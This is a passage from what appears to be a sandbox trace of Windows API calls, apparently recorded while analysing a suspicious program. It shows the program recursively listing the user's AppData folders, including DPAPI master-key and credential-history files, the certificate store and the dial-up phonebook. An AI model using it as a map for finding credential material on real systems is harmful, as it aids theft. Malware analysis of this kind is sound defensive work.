hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.537] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.537] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network", pszFile="Connections" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections" [0083.537] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*" [0083.537] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.537] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.537] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.537] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections", pszFile="Pbk" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk" [0083.537] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*" [0083.537] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.537] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.537] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.537] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk", pszFile="_hiddenPbk" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk" [0083.538] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*" [0083.538] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.538] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.538] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.538] PathMatchSpecW (pszFile="rasphone.pbk", pszSpec="*") returned 1 [0083.538] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.538] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.538] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.538] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.538] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.538] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.538] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.538] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.538] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.538] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Office" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office" [0083.538] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\*" [0083.538] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.538] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.538] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.538] PathMatchSpecW (pszFile="MSO1033.acl", pszSpec="*") returned 1 [0083.538] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.538] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office", pszFile="Recent" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\Recent") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\Recent" [0083.538] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\Recent", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*" [0083.538] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.539] PathMatchSpecW (pszFile="Database1.LNK", pszSpec="*") returned 1 [0083.539] PathMatchSpecW (pszFile="Global.LNK", pszSpec="*") returned 1 [0083.539] PathMatchSpecW (pszFile="index.dat", pszSpec="*") returned 1 [0083.539] PathMatchSpecW (pszFile="My Documents.LNK", pszSpec="*") returned 1 [0083.539] PathMatchSpecW (pszFile="receipt-parcel-UK980-456.LNK", pszSpec="*") returned 1 [0083.539] PathMatchSpecW (pszFile="Templates.LNK", pszSpec="*") returned 1 [0083.539] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.539] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.539] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="OneNote" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote" [0083.539] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\*" [0083.539] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.539] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote", pszFile="16.0" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\16.0") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\16.0" [0083.539] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\16.0", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\*" [0083.540] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.540] PathMatchSpecW (pszFile="Preferences.dat", pszSpec="*") returned 1 [0083.540] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.540] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.540] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Outlook" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Outlook") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Outlook" [0083.540] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Outlook", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Outlook\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Outlook\\*" [0083.540] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Outlook\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.540] PathMatchSpecW (pszFile="Outlook.srs", pszSpec="*") returned 1 [0083.540] PathMatchSpecW (pszFile="Outlook.xml", pszSpec="*") returned 1 [0083.540] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.540] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="PowerPoint" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\PowerPoint") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\PowerPoint" [0083.540] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\PowerPoint", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\PowerPoint\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\PowerPoint\\*" [0083.540] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\PowerPoint\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.540] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.540] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Proof" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Proof") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Proof" [0083.540] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Proof", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Proof\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Proof\\*" [0083.540] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Proof\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.540] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.540] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Protect" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect" [0083.540] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\*" [0083.540] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.541] PathMatchSpecW (pszFile="CREDHIST", pszSpec="*") returned 1 [0083.541] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect", pszFile="S-1-5-21-2345716840-1148442690-1481144037-1000" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2345716840-1148442690-1481144037-1000") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2345716840-1148442690-1481144037-1000" [0083.541] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2345716840-1148442690-1481144037-1000", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2345716840-1148442690-1481144037-1000\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2345716840-1148442690-1481144037-1000\\*" [0083.541] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2345716840-1148442690-1481144037-1000\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.541] PathMatchSpecW (pszFile="1862f3be-4467-4925-a93f-badcfb2203ba", pszSpec="*") returned 1 [0083.541] PathMatchSpecW (pszFile="1a231b4e-0d4b-4bef-bfe5-101dc3660c19", pszSpec="*") returned 1 [0083.541] PathMatchSpecW (pszFile="Preferred", pszSpec="*") returned 1 [0083.541] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.541] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect", pszFile="S-1-5-21-3111613574-2524581245-2586426736-500" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500" [0083.541] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*" [0083.541] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.541] PathMatchSpecW (pszFile="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", pszSpec="*") returned 1 [0083.541] PathMatchSpecW (pszFile="Preferred", pszSpec="*") returned 1 [0083.541] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.542] PathMatchSpecW (pszFile="SYNCHIST", pszSpec="*") returned 1 [0083.542] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.542] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Publisher" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher" [0083.542] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher\\*" [0083.542] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.542] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.542] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Publisher Building Blocks" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks" [0083.542] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*" [0083.542] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.542] PathMatchSpecW (pszFile="ContentStore.xml", pszSpec="*") returned 1 [0083.542] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.542] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Speech" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Speech") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Speech" [0083.542] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Speech", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Speech\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Speech\\*" [0083.542] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Speech\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.542] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.542] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="SystemCertificates" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates" [0083.543] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*" [0083.543] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.543] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates", pszFile="My" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My" [0083.543] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*" [0083.543] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.543] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="Certificates" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates" [0083.543] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*" [0083.543] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.543] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.543] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="CRLs" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs" [0083.543] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*" [0083.543] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.543] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.543] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="CTLs" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs" [0083.543] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*" [0083.543] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.543] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.543] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.543] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.543] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Templates" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates" [0083.543] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\*" [0083.543] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.544] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates", pszFile="LiveContent" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent" [0083.544] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\*" [0083.544] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.544] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent", pszFile="16" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16" [0083.544] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\*" [0083.544] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.544] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16", pszFile="Managed" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed" [0083.544] PathCombineW (in: 